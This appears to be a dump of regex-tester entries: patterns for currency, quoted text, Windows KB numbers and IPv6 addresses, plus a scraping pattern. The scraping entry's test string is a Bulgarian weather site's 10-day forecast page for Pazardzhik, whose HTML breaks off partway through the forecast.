$ en anglais ($xx.xx) | \$\d+\.\d{2}(?!\d) | $19.48
$1234.2312
| $ en anglais ($xx.xx) | 2015-09-07T21:59:55.000Z |
Buscar o reemplazar 'texto entre caracateres especiales', | (\')(.*?)(\') | Buscar o reemplazar 'texto entre caracateres especiales',
Buscar o reemplazar 'texto entre caracateres especiales',
Buscar o reemplazar 'texto entre caracateres especiales'
--------------------------------------------------------,
Buscar o reemplazar 'texto entre caracateres especiales', | Buscar o reemplazar 'texto entre caracateres especiales', | 2016-09-12T18:54:03.000Z |
[^\d.] | 123.4
1 000 000
1,000,000 | Currency to input | 2021-03-10T01:39:41.000Z |
|
^[0-9][' ']{7,7} | 1 KB4021558
2 KB4021915
2 KB4022747
2 KB4022884
2 KB4022887
2 KB4024323
2 KB4024402
3 KB3203427
3 KB3203484
4 KB3127894
4 KB3191828
4 KB3203436
4 KB3203438
5 KB4014580
6 KB2756918
7 KB4014570 | Build KB Call, #1 | 2017-06-15T20:11:31.000Z |
|
^(?<IPv6>(?#
6{ h16 ":" } ls32
)((?<IPv6_1_R_H16>[0-9a-f]{4,4})\:){6,6}(?<IPV6_1_R_LS32>((?<IPV6_1_R_LS32_IPV4_DEC_OCTET>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3,3}(?<IPV6_1_R_LS32_IPV4_DEC_OCTET_>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])|(?<IPV6_1_R_LS32_H16_1>[0-9a-f]{4,4})\:(?<IPV6_1_R_LS32_H16_2>[0-9a-f]{4,4}))|(?#
"::" 5{ h16 ":" } ls32
)\:\:((?<IPV6_2_R_H16>[0-9a-f]{4,4})\:){5,5}(?<IPV6_2_R_LS32>((?<IPV6_2_R_LS32_IPV4_DEC_OCTET>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3,3}(?<IPV6_2_R_LS32_IPV4_DEC_OCTET_>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])|(?<IPV6_2_R_LS32_H16_1>[0-9a-f]{4,4})\:(?<IPV6_2_R_LS32_H16_2>[0-9a-f]{4,4}))|(?#
[ h16 ] "::" 4{ h16 ":" } ls32
)(?<IPV6_3_L_H16>[0-9a-f]{4,4})?\:\:((?<IPV6_3_R_H16>[0-9a-f]{4,4})\:){4,4}(?<IPV6_3_R_LS32>((?<IPV6_3_R_LS32_IPV4_DEC_OCTET>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3,3}(?<IPV6_3_R_LS32_IPV4_DEC_OCTET_>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])|(?<IPV6_3_R_LS32_H16_1>[0-9a-f]{4,4})\:(?<IPV6_3_R_LS32_H16_2>[0-9a-f]{4,4}))|(?#
[ *1{ h16 ":" } h16 ] "::" 3{ h16 ":" } ls32
)(((?<IPV6_4_L_H16_REPEAT>[0-9a-f]{4,4})\:)?(?<IPV6_4_L_H16>[0-9a-f]{4,4}))?\:\:((?<IPV6_4_R_H16>[0-9a-f]{4,4})\:){3,3}(?<IPV6_4_R_LS32>((?<IPV6_4_R_LS32_IPV4_DEC_OCTET>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3,3}(?<IPV6_4_R_LS32_IPV4_DEC_OCTET_>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])|(?<IPV6_4_R_LS32_H16_1>[0-9a-f]{4,4})\:(?<IPV6_4_R_LS32_H16_2>[0-9a-f]{4,4}))|(?#
[ *2{ h16 ":" } h16 ] "::" 2{ h16 ":" } ls32
)(((?<IPV6_5_L_H16_REPEAT>[0-9a-f]{4,4})\:){0,2}(?<IPV6_5_L_H16>[0-9a-f]{4,4}))?\:\:((?<IPV6_5_R_H16>[0-9a-f]{4,4})\:){2,2}(?<IPV6_5_R_LS32>((?<IPV6_5_R_LS32_IPV4_DEC_OCTET>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3,3}(?<IPV6_5_R_LS32_IPV4_DEC_OCTET_>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])|(?<IPV6_5_R_LS32_H16_1>[0-9a-f]{4,4})\:(?<IPV6_5_R_LS32_H16_2>[0-9a-f]{4,4}))|(?#
[ *3{ h16 ":" } h16 ] "::" h16 ":" ls32
)(((?<IPV6_6_L_H16_REPEAT>[0-9a-f]{4,4})\:){0,3}(?<IPV6_6_L_H16>[0-9a-f]{4,4}))?\:\:(?<IPV6_6_R_H16>[0-9a-f]{4,4})\:(?<IPV6_6_R_LS32>((?<IPV6_6_R_LS32_IPV4_DEC_OCTET>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3,3}(?<IPV6_6_R_LS32_IPV4_DEC_OCTET_>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])|(?<IPV6_6_R_LS32_H16_1>[0-9a-f]{4,4})\:(?<IPV6_6_R_LS32_H16_2>[0-9a-f]{4,4}))|(?#
[ *4{ h16 ":" } h16 ] "::" ls32
)(((?<IPV6_7_L_H16_REPEAT>[0-9a-f]{4,4})\:){0,4}(?<IPV6_7_L_H16>[0-9a-f]{4,4}))?\:\:(?<IPV6_7_R_LS32>((?<IPV6_7_R_LS32_IPV4_DEC_OCTET>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3,3}(?<IPV6_7_R_LS32_IPV4_DEC_OCTET_>[0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])|(?<IPV6_7_R_LS32_H16_1>[0-9a-f]{4,4})\:(?<IPV6_7_R_LS32_H16_2>[0-9a-f]{4,4}))|(?#
[ *5{ h16 ":" } h16 ] "::" h16
)(((?<IPV6_8_L_H16_REPEAT>[0-9a-f]{4,4})\:){0,5}(?<IPV6_8_L_H16>[0-9a-f]{4,4}))?\:\:(?<IPV6_8_R_H16>[0-9a-f]{4,4})|(?#
[ *6{ h16 ":" } h16 ] "::"
)(((?<IPV6_9_L_H16_REPEAT>[0-9a-f]{4,4})\:){0,6}(?<IPV6_9_L_H16>[0-9a-f]{4,4}))?\:\:(?#
End
))$ | 2006:2006:2006:2006:: | RFC 3986 IPv6 Validation | 2017-09-25T14:16:05.000Z |
|
<span.+>(.+)\s+<.+>(.+)<.+>\s+<.+\s+<.+>(\d+).+<.+>\s+<.+>.+<.+>\s+<.+>(\d+).+\s+.+>\s+<.+>\s+(\d.\d+).+\s+<.+>(\d+).+<.+>\s+<.+>(\d+.\d+).+\s+.+(\d).+<.+>\s+<.+>(\d).+.+\s+<.+>.+\s+<.+>.+>\s+<.+>.+\s+<.+>.+ | <!DOCTYPE html>
<html lang="bg" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<!-- test 111 -->
<meta charset="UTF-8"/>
<link rel="dns-prefetch" href="//m.netinfo.bg"/>
<link rel="dns-prefetch" href="//a.abv.bg"/>
<link rel="dns-prefetch" href="//diff3.smartadserver.com"/>
<link rel="stylesheet" href="https://m3.netinfo.bg/sinoptik/css/main-4.7.min.css?v=20190625"/>
<link rel="stylesheet" href="https://m3.netinfo.bg/sinoptik/css/jquery-ui.css"/>
<!--[if IE]>
<link href="https://m3.netinfo.bg/sinoptik/css/ie_only_style-0.1.css" rel="stylesheet" type="text/css"><![endif]-->
<!--[if IE 9]>
<link href="https://m3.netinfo.bg/sinoptik/css/ie9_only_style.css" rel="stylesheet" type="text/css" media="all"/><![endif]-->
<link rel="shortcut icon" type="image/x-icon"
href="https://m.netinfo.bg/sinoptik/images/favicon.ico?v=1"/>
<script type="text/javascript" src="https://m5.netinfo.bg/jquery/niquery.js"></script>
<script type="text/javascript" src="https://m4.netinfo.bg/sinoptik/js/jquery-ui.js"></script>
<script type="text/javascript" src="https://m4.netinfo.bg/sinoptik/js/plugins.min.js"></script>
<script type="text/javascript" src="https://m4.netinfo.bg/sinoptik/js/interface-0.3.js?v=1.3"></script>
<script src="https://m.netinfo.bg/assets/richMedia.js?v=2" crossorigin="anonymous"></script>
<!--[if lt IE 9]>
<script src="https://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
<title>10-дневна прогноза за времето в Пазарджик, България - Sinoptik.bg</title>
<meta name="description" content="10-дневна подробна прогноза за времето в Пазарджик."/>
<meta property="fb:admins" content="692215833"/>
<meta property="fb:app_id" content="175064929208472"/>
<meta property="og:title" content="10-дневна прогноза за времето в Пазарджик, България - Sinoptik.bg"/>
<meta property="og:type" content="article"/>
<meta property="og:url" content="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days"/>
<meta property="og:image" content="https://m.netinfo.bg/sinoptik/icons/big/d000.png"/>
<meta property="og:site_name" content="Sinoptik.bg - Времето в България и по света"/>
<meta property="og:description" content="10-дневна подробна прогноза за времето в Пазарджик."/>
<link rel="alternate" href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days" hreflang="bg-BG"/>
<link rel="alternate" href="https://weather.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days" hreflang="en-BG"/>
<link rel="canonical"
href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days">
<link rel="alternate" media="only screen and (max-width: 640px)"
href="https://m.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days">
<link rel="alternate" media="handheld" href="https://m.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days">
<link rel="manifest" href="/manifest.json">
<script type="text/javascript">
function getCookie(name) {
var value = "; " + document.cookie;
var parts = value.split("; " + name + "=");
if (parts.length == 2) return parts.pop().split(";").shift();
}
var segmentsnetinfo;
var dmpcity;
var sas_target_netinfo = "";
if (typeof (Storage) !== "undefined") {
segmentsnetinfo = localStorage.getItem('NetinfoSegs');
dmpcity = localStorage.getItem('NetinfoRegion');
} else if (navigator.cookieEnabled) {
segmentsnetinfo = getCookie('NetinfoSegs');
dmpcity = getCookie('NetinfoRegion');
}
if (segmentsnetinfo != null) {
segmentsnetinfo = segmentsnetinfo.replace(/\[|\]/g, '');
segmentsnetinfo = segmentsnetinfo.split('.');
for (x in segmentsnetinfo) {
sas_target_netinfo += 'netinfodmp=' + segmentsnetinfo[x] + ';';
}
}
if (dmpcity != null) {
sas_target_netinfo += 'dmpcity=' + dmpcity + ';';
}
</script>
<script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script>
<script>
var OneSignal = window.OneSignal || [];
OneSignal.push(["init", {
appId: "62a81730-cb16-426d-a1fa-2dd4bf74186e",
autoRegister: true,
requiresUserPrivacyConsent: true,
welcomeNotification: {
"title": "Sinoptik",
"message": "Благодарим ви за абонамента",
},
notifyButton: {
enable: true,
displayPredicate: function () {
return OneSignal.isPushNotificationsEnabled()
.then(function (isEnabled) {
return !isEnabled;
});
},
size: 'small',
prenotify: true,
showCredit: false,
text: {
'tip.state.unsubscribed': 'Получaвайте известия от Sinoptik',
'tip.state.subscribed': "Абонирани сте за известия",
'tip.state.blocked': "Блокирахте получаването на известия",
'message.prenotify': 'Натиснете тук за абонамент за известия',
'message.action.subscribed': "Благодарим за абонамента!",
'message.action.resubscribed': "Абонирани сте за известия",
'message.action.unsubscribed': "Изпращането на известия е прекратено",
'dialog.main.title': 'Настройки на известията',
'dialog.main.button.subscribe': 'Абонирайте се',
'dialog.main.button.unsubscribe': 'Прекратяване на абонамента',
'dialog.blocked.title': 'Отблокиране на известията',
'dialog.blocked.message': "Следвайте инструкциите, за да активирате известията:"
},
colors: {
'circle.background': 'rgb(42,42,42)',
'badge.background': 'rgb(42,42,42)',
'dialog.button.background': 'rgb(42,42,42)',
'dialog.button.background.hovering': 'rgb(248,248,248)',
},
}
}]);
OneSignal.push(function () {
var tags = {};
if (dmpcity != null) {
tags["dmpcity"] = dmpcity;
}
if (segmentsnetinfo != null) {
if (typeof (segmentsnetinfo) === 'string') {
segmentsnetinfo = segmentsnetinfo.replace(/\[|\]/g, '');
segmentsnetinfo = segmentsnetinfo.split(',');
}
for (segment of segmentsnetinfo) {
tags[segment] = 1;
}
}
if (Object.keys(tags).length) {
OneSignal.sendTags(tags);
}
});
//cookie must contain string "2222222" or with more "2" (up to 15)
if (/2{5,15}/.test(getCookie('netinfo_consent_bit'))) {
var consent = true;
}
setTimeout(userTappedProvideConsentButton, 2000);
function userTappedProvideConsentButton() {
if (typeof consent !== 'undefined') {
// Will initialize the SDK and register for push notifications
OneSignal.push(function () {
OneSignal.provideUserConsent(true);
});
}
}
</script>
<script async="async" src='https://www.googletagservices.com/tag/js/gpt.js'></script>
<script>
var googletag = googletag || {};
googletag.cmd = googletag.cmd || [];
</script>
<script>
/*
googletag.cmd.push(function() {
googletag.defineSlot('/157018629/Sinoptik.bg/Desktop/All_pages/Hidden/RichMedia', [1, 1], 'div-gpt-ad-1526903420347-0').addService(googletag.pubads());
googletag.defineSlot('/157018629/Sinoptik.bg/Desktop/All_pages/Leaderboard/ATF', [[1, 1], [970, 250], [728, 90]], 'div-gpt-ad-1526903420347-1').addService(googletag.pubads());
googletag.defineSlot('/157018629/Sinoptik.bg/Desktop/All_pages/Leaderboard/BTF', [[640, 300], [1, 1]], 'div-gpt-ad-1526903420347-2').addService(googletag.pubads());
googletag.defineSlot('/157018629/Sinoptik.bg/Desktop/All_pages/Leaderboard/BTF2', [[1, 1], [970, 250], [728, 90]], 'div-gpt-ad-1526903420347-3').addService(googletag.pubads());
googletag.defineSlot('/157018629/Sinoptik.bg/Desktop/All_pages/Rectangle/ATF', [[1, 1], [300, 600], [300, 250]], 'div-gpt-ad-1526903420347-4').addService(googletag.pubads());
googletag.defineSlot('/157018629/Sinoptik.bg/Desktop/All_pages/Rectangle/BTF', [[1, 1], [300, 600], [300, 250]], 'div-gpt-ad-1526903420347-5').addService(googletag.pubads());
googletag.defineSlot('/157018629/Sinoptik.bg/Desktop/All_pages/Rectangle/BTF2', [[1, 1], [300, 600], [300, 250]], 'div-gpt-ad-1526903420347-6').addService(googletag.pubads());
//googletag.pubads().enableSyncRendering();
googletag.pubads().enableSingleRequest();
googletag.enableServices();
});
*/
</script>
<script type="text/javascript" src="https://lib.wtg-ads.com/lib.min.js" async></script>
<script>
var w2g = w2g || {};
w2g.targeting = {};
/* modify SAS target with Krux segments */
sas_target = 'lid=100728378;country=BG;section=index;;period=tendays' + ';' + sas_target_netinfo;
sas_target += ';' + sas_target_netinfo;
sas_target = sas_target.replace("&", ";");
/* modify SAS target with Krux segments */
var dfp_target = sas_target.split(";");
dfp_target.forEach(function (entry) {
onetarget = entry.split("=");
if (w2g.targeting[onetarget[0]] === 'undefined' || w2g.targeting[onetarget[0]] === null || !w2g.targeting[onetarget[0]]) {
w2g.targeting[onetarget[0]] = [onetarget[1]];
} else {
w2g.targeting[onetarget[0]].push(onetarget[1]);
}
});
w2g.cmd = w2g.cmd || [];
if (/2{5,15}/.test(getCookie('netinfo_consent_bit'))) {
var consent = true;
}
if (typeof consent !== 'undefined') {
w2g.cmd.push(function () {
w2g.run(consent);
});
}
</script>
<style type="text/css">nav li a {
padding: 7px 25px 2px;
padding: 8px 21px 2px \9; /*ie8 fix*/
}
</style>
</head>
<body>
<!-- Google Tag Manager -->
<script>
dataLayer = [];
</script>
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-54V594"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-54V594');</script>
<!-- End Google Tag Manager --> <div id="fb-root"></div>
<script>
window.fbAsyncInit = function () {
FB.init({appId: '175064929208472', status: false, cookie: false, oauth: false, xfbml: true});
};
(function (d) {
var js, id = 'facebook-jssdk';
if (d.getElementById(id)) {
return;
}
js = d.createElement('script');
js.id = id;
js.async = true;
js.src = "//connect.facebook.net/bg_BG/all.js";
d.getElementsByTagName('head')[0].appendChild(js);
}(document));
</script>
<script>
window.___gcfg = {lang: 'bg'};
(function () {
var po = document.createElement('script');
po.type = 'text/javascript';
po.async = true;
po.src = 'https://apis.google.com/js/plusone.js';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(po, s);
})();
</script>
<div class="wrapper">
<!-- HEADER BEGIN -->
<header>
<div class="headerTop">
<div>
<ul>
<li><a class="netinfoTopLogo" target="_blank" href="http://www.netinfocompany.bg/">Нетинфо</a></li>
<li><a class="vestiTopLogo" target="_blank" href="https://www.vesti.bg/">Vesti.bg</a><span
class="sep">|</span></li>
<li><a class="sportniTopLogo" target="_blank" href="https://gong.bg/">Gong.bg</a><span
class="sep">|</span></li>
<li><a class="darknewsTopLogo" target="_blank" href="https://dariknews.bg/">Dariknews.bg</a><span
class="sep">|</span></li>
<li><a class="novaTopLogo" target="_blank" href="https://nova.bg/">Nova.bg</a><span
class="sep">|</span>
</li>
<li><a class="ednaTopLogo" target="_blank" href="https://edna.bg/">Edna.bg</a></li>
</ul>
<div class="memberArea_tempScales">
<div class="tempScales">
<a href="https://weather.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days" class="langSelect"
title="English version"><img
src="https://m.netinfo.bg/sinoptik/images/flag_en.jpg"
width="16" height="11"/> English</a>
</div>
<div class="tempScales">
<a href="javascript:;" onclick="SetCookie('units', 'C', 1500, '/', '.sinoptik.bg');
window.location.reload();"
class="tempDegree selected"
title="Целзий">°C</a>
<a href="javascript:;" onclick="SetCookie('units', 'F', 1500, '/', '.sinoptik.bg');
window.location.reload();"
class="tempFahrenheit"
title="Фаренхайт">°F</a>
</div>
</div>
</div>
</div>
<div class="headerMain">
<div>
<a href="https://www.sinoptik.bg/" class="sinoptikLogo" style="background: url(https://bimg.abv.bg/sinoptik/desktop11.png) no-repeat; background-size: 100%; top:10px; height:80px;" >Прогноза за времето в България и по света от Sinoptik.bg</a>
<div class="searchTop">
<form method="get" action="https://www.sinoptik.bg/search">
<p>
<input type="text" id="searchField" name="q" title="Търси град"
value=""
class="searchTopField blur"/>
<button class="searchTopButton">Търси</button>
</p>
<p class="radioButtons">
<input type="radio" id="inSinoptik" name="in" value="sinoptik" checked="checked"/>
<label for="inSinoptik">В Sinoptik.bg</label>
<input type="radio" id="inMap" name="in" value="map"/>
<label for="inMap">В карта</label>
</p>
</form>
</div>
<div class="mobileSocialWidgets">
<a href="https://m.sinoptik.bg/?view=mobile" target="_blank"
class="mobile"
title="Мобилна версия">Мобилна версия</a>
<a href="http://www.facebook.com/Sinoptik.bg" target="_blank" class="fb"
title="Стани фен">Стани фен</a>
<a href="https://instagram.com/sinoptik.bg" target="_blank" class="insta"
title="Instagram профил">Instagram профил</a>
<a href="https://www.sinoptik.bg/widgets" class="widgetsIco"
title="Времето в твоя сайт">Времето в твоя сайт</a>
</div>
</div>
</div>
</header>
<!---- HEADER END ----->
<!---- NAVIGATION BEGIN ----->
<nav>
<div>
<ul>
<li class="first selected">
<a href="https://www.sinoptik.bg/">Начало</a>
</li>
<li>
<a href="https://www.sinoptik.bg/locations/europe/bulgaria">България</a>
</li>
<li>
<a href="https://www.sinoptik.bg/locations/europe">Европа</a>
</li>
<li>
<a href="https://www.sinoptik.bg/locations">Свят</a>
</li>
<li>
<a href="https://www.sinoptik.bg/resorts">Курорти</a>
</li>
<!-- <li>
<a href="https://www.sinoptik.bg/ski-conditions">Курорти</a>
</li>-->
<li>
<a href="https://www.sinoptik.bg/moon-phase"> Фаза на луната</a>
</li>
<li>
<a href="https://www.sinoptik.bg/map">Карта</a>
</li>
<li>
<a href="https://www.sinoptik.bg/news">За времето</a>
</li>
<li>
<a href="https://www.sinoptik.bg/video">Видео</a>
</li>
</ul>
</div>
</nav>
<!---- NAVIGATION END ----->
<div class="nav_banner">
<!-- /157018629/Sinoptik.bg/Desktop/All_pages/Leaderboard/ATF -->
<div id='div-gpt-ad-1526903420347-1'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1526903420347-1'); });
</script>
</div>
</div><center>
<!-- <script>
//create fake element, that will be removed by AdBlocker
var test = document.createElement('div');
test.innerHTML = ' ';
test.className = 'adsbox';
document.body.appendChild(test);
setTimeout(function(){ doFallback(); },2000);
//if that element is remved - show Adwise
function doFallback(){
if ($('.adsbox').length<3) {
adwise_w = 728;
adwise_h = 90;
adwise_publisher_id = 2307;
adwise_channel_id = 2;
adwise_ads = 2;
document.write('<script type="text/javascript" src="//i.adwise.bg/context/context-0.1.js"><\/script>');
}
}
</script>-->
</center>
<!---- CONTAINER BEGIN ----->
<div class="container">
<!---- MY CITIES BEGIN ----->
<!---- MY CITIES END ----->
<!---- MAIN BLOCK BEGIN ----->
<div class="mainBlock">
<div class="currentCityBlock">
<div class="currentCityInfo">
<a href="https://www.sinoptik.bg/locations/europe">
Европа</a>,
<a href="https://www.sinoptik.bg/locations/europe/bulgaria">
България</a> <div class="currentCityHeading">
<h1 class="currentCity">Пазарджик</h1>
</div>
<span class="currentTime">Обновено в <time>10:51 ч. на 1 юли</time></span>
</div>
<div class="addCurrentDefaultCity">
<a class="addCurrentCity" onclick="AddLocation(100728378,'България'); window.location.reload();" href="#">Добави в моите градове</a>
<a class="defaultCity" onclick="SetDefault(100728378); window.location.reload();" href="#">Отваряй по подразбиране</a>
</div>
</div>
<!---- WEATHER FORECAST BEGIN ----->
<div class="weatherForecast">
<ul class="weatherForecastTabs wfTabs">
<li class="wfCurrent">
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378">
В момента</a>
</li>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/hourly">
24-часова</a>
</li>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/weekend">
Уикенд</a>
</li>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/5-days">
5-дневна</a>
</li>
<li class="wf10day selected">
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days">
10-дневна</a>
</li>
</ul>
<div class="wfWrapper">
<div id="wf10day" class="tabContent wf10dayShort">
<div class="wf10dayContent">
<span class="wf10dayHeading wf10dayCondHeading">Прогноза:</span>
<span class="wf10dayHeading wf10dayMaxTempHeading">Максимална:</span>
<span class="wf10dayHeading wf10dayMinTempHeading">Минимална:</span>
<span class="wf10dayHeading wf10dayWindHeading">Вятър:</span>
<span class="wf10dayHeading wf10dayRainHeading">Вероятност за валежи:</span>
<span class="wf10dayHeading">Количество валежи:</span>
<span class="wf10dayHeading">Вероятност за буря:</span>
<span class="wf10dayHeading wf10daySRHeading">Облачност:</span>
<span class="wf10dayHeading wf10daySRHeading">UV индекс:</span>
<span class="wf10dayHeading wf10daySRHeading">Изгрев:</span>
<span class="wf10dayHeading wf10daySRHeading">Залез:</span>
<span class="wf10dayHeading wf10dayDayLengthHeading">Продължителност на деня:</span>
<span class="wf10dayHeading wf10dayMoonPhaseHeading">Фаза на луната:</span>
<span class="wf10dayHeading wf10dayZodiacHeading">Зодиакален знак:</span>
<span class="wf10dayHeading wf10dayDayLightHeading">Осветеност:</span>
<span class="wf10dayHeading wf10dayMoonCycleHeading">Позиция в лунен цикъл:</span>
</div>
<div class="wf10dayRightContent">
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/1" class="wf10dayRight wf10dayRightFirst " title="Виж подробна прогноза">
<span class="wf10dayRightDay">Пн.</span>
<span class="wf10dayRightDate">01.07.19</span>
<img src="https://m.netinfo.bg/sinoptik/icons/small/d000.png" width="48" height="49" class="wf10dayRightImg" alt="Слънчево" title="Слънчево" />
<span class="wf10dayRightTemp" title="Максимална температура">33°</span>
<span class="sep">—</span>
<span class="wf10dayRightTempLow" title="Минимална температура">14°</span>
<span class="wf10dayRightWind" title="югоизток, лек полъх">
<span class="windImg10dayTopSE"> </span>
1.7 m/s </span>
<span class="wf10dayRighValue wf10dayRightRainValue">2%</span>
<span class="wf10dayRighValue">0.0 mm</span>
<span class="wf10dayRighValue">0%</span>
<span class="wf10dayRighValue">0%</span>
<span class="wf10dayRighValue">9</span>
<span class="wf10dayRighValue">05:49 ч.</span>
<span class="wf10dayRighValue">21:02 ч.</span>
<span class="wf10dayRighValue wf10dayDayLengthValue">15:12 ч.</span>
<span class="wf10dayRighValue wf10dayRightMoonPhaseValue"><img src="https://m.netinfo.bg/sinoptik/icons/moon/m29.png" width="37" height="38" title="Намаляващ полумесец" alt="Намаляващ полумесец" /></span>
<span class="wf10dayRighValue wf10dayZodiacValue">Близнаци</span>
<span class="wf10dayRighValue wf10dayDayLightValue">3%</span>
<span class="wf10dayRighValue wf10dayRightMoonCycleValue">0.95</span>
</a>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/2" class="wf10dayRight " title="Виж подробна прогноза">
<span class="wf10dayRightDay">Вт.</span>
<span class="wf10dayRightDate">02.07.19</span>
<img src="https://m.netinfo.bg/sinoptik/icons/small/d000.png" width="48" height="49" class="wf10dayRightImg" alt="Слънчево" title="Слънчево" />
<span class="wf10dayRightTemp" title="Максимална температура">35°</span>
<span class="sep">—</span>
<span class="wf10dayRightTempLow" title="Минимална температура">17°</span>
<span class="wf10dayRightWind" title="югоизток, тих">
<span class="windImg10dayTopSE"> </span>
1.5 m/s </span>
<span class="wf10dayRighValue wf10dayRightRainValue">2%</span>
<span class="wf10dayRighValue">0.0 mm</span>
<span class="wf10dayRighValue">4%</span>
<span class="wf10dayRighValue">0%</span>
<span class="wf10dayRighValue">9</span>
<span class="wf10dayRighValue">05:50 ч.</span>
<span class="wf10dayRighValue">21:02 ч.</span>
<span class="wf10dayRighValue wf10dayDayLengthValue">15:12 ч.</span>
<span class="wf10dayRighValue wf10dayRightMoonPhaseValue"><img src="https://m.netinfo.bg/sinoptik/icons/moon/m30.png" width="37" height="38" title="Новолуние" alt="Новолуние" /></span>
<span class="wf10dayRighValue wf10dayZodiacValue">Рак</span>
<span class="wf10dayRighValue wf10dayDayLightValue">0%</span>
<span class="wf10dayRighValue wf10dayRightMoonCycleValue">0.98</span>
</a>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/3" class="wf10dayRight " title="Виж подробна прогноза">
<span class="wf10dayRightDay">Ср.</span>
<span class="wf10dayRightDate">03.07.19</span>
<img src="https://m.netinfo.bg/sinoptik/icons/small/d100.png" width="48" height="49" class="wf10dayRightImg" alt="Предимно слънчево" title="Предимно слънчево" />
<span class="wf10dayRightTemp" title="Максимална температура">37°</span>
<span class="sep">—</span>
<span class="wf10dayRightTempLow" title="Минимална температура">17°</span>
<span class="wf10dayRightWind" title="североизток, тих">
<span class="windImg10dayTopNE"> </span>
1.5 m/s </span>
<span class="wf10dayRighValue wf10dayRightRainValue">3%</span>
<span class="wf10dayRighValue">0.0 mm</span>
<span class="wf10dayRighValue">3%</span>
<span class="wf10dayRighValue">5%</span>
<span class="wf10dayRighValue">9</span>
<span class="wf10dayRighValue">05:50 ч.</span>
<span class="wf10dayRighValue">21:02 ч.</span>
<span class="wf10dayRighValue wf10dayDayLengthValue">15:11 ч.</span>
<span class="wf10dayRighValue wf10dayRightMoonPhaseValue"><img src="https://m.netinfo.bg/sinoptik/icons/moon/m2.png" width="37" height="38" title="Нарастващ полумесец" alt="Нарастващ полумесец" /></span>
<span class="wf10dayRighValue wf10dayZodiacValue">Рак</span>
<span class="wf10dayRighValue wf10dayDayLightValue">0%</span>
<span class="wf10dayRighValue wf10dayRightMoonCycleValue">0.02</span>
</a>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/4" class="wf10dayRight " title="Виж подробна прогноза">
<span class="wf10dayRightDay">Чт.</span>
<span class="wf10dayRightDate">04.07.19</span>
<img src="https://m.netinfo.bg/sinoptik/icons/small/d240.png" width="48" height="49" class="wf10dayRightImg" alt="Облачно, дъжд с гръмотевици" title="Облачно, дъжд с гръмотевици" />
<span class="wf10dayRightTemp" title="Максимална температура">34°</span>
<span class="sep">—</span>
<span class="wf10dayRightTempLow" title="Минимална температура">19°</span>
<span class="wf10dayRightWind" title="югоизток, лек полъх">
<span class="windImg10dayTopSE"> </span>
2.0 m/s </span>
<span class="wf10dayRighValue wf10dayRightRainValue">59%</span>
<span class="wf10dayRighValue">0.7 mm</span>
<span class="wf10dayRighValue">74%</span>
<span class="wf10dayRighValue">38%</span>
<span class="wf10dayRighValue">9</span>
<span class="wf10dayRighValue">05:51 ч.</span>
<span class="wf10dayRighValue">21:02 ч.</span>
<span class="wf10dayRighValue wf10dayDayLengthValue">15:10 ч.</span>
<span class="wf10dayRighValue wf10dayRightMoonPhaseValue"><img src="https://m.netinfo.bg/sinoptik/icons/moon/m3.png" width="37" height="38" title="Нарастващ полумесец" alt="Нарастващ полумесец" /></span>
<span class="wf10dayRighValue wf10dayZodiacValue">Лъв</span>
<span class="wf10dayRighValue wf10dayDayLightValue">3%</span>
<span class="wf10dayRighValue wf10dayRightMoonCycleValue">0.06</span>
</a>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/5" class="wf10dayRight " title="Виж подробна прогноза">
<span class="wf10dayRightDay">Пт.</span>
<span class="wf10dayRightDate">05.07.19</span>
